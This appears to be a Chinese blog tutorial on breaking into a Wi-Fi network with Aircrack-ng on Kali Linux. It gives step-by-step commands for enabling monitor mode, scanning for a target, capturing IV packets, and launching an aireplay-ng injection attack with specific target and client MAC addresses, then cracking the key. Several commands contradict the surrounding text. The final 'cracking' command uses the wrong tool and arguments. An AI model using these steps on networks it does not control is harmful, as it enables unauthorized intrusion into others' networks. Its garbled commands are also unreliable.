第一步所谓的开启网卡:airmon-ng wlan0 up,我测试半天,不管用,反正我的网卡已经启用了,无所谓了。

第二步:开启监听模式airmon-ng start wlan0,结果如下

kalilinux下使用Aircrack-ng破解过程_第1张图片

如果你要是看不到monitor mode enabled这些字眼,就再启动一次,不要启动多次,启动多次会出现wlan0mon、 wlan0monmon、 wlan0monmonmon不知为啥那么多,为防止瞎了,所以干脆就出现一个wlan0mon

第三步:airodump-ng wlan0mon   探测我们要***的目标主机

主要我们要查看目标的通道ch多少,和前两个BSSID和STATION两个值到底多少。

第四步:airodump-ng --ivs -w longas -c 1 wlan0mon  开始抓包! 转包文件为当前文件夹下longas-01.ivs

  #--ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs);-c后面跟频道,如这里的6 。  

第五步:然后新开一个终端窗口,对目标主机进行deauth***,以加速抓包!命令格式aireplay-ng -0 大小 -a 目标主机mac -c 客户端 mac mon0  

 aireplay-ng -3 -b D8:24:BD:79:2A:9B -h 00:26:C7:79:9C:32 wlan0mon

第六步:破解密码

airodump-ng  longas-01.ivs -w dic.txt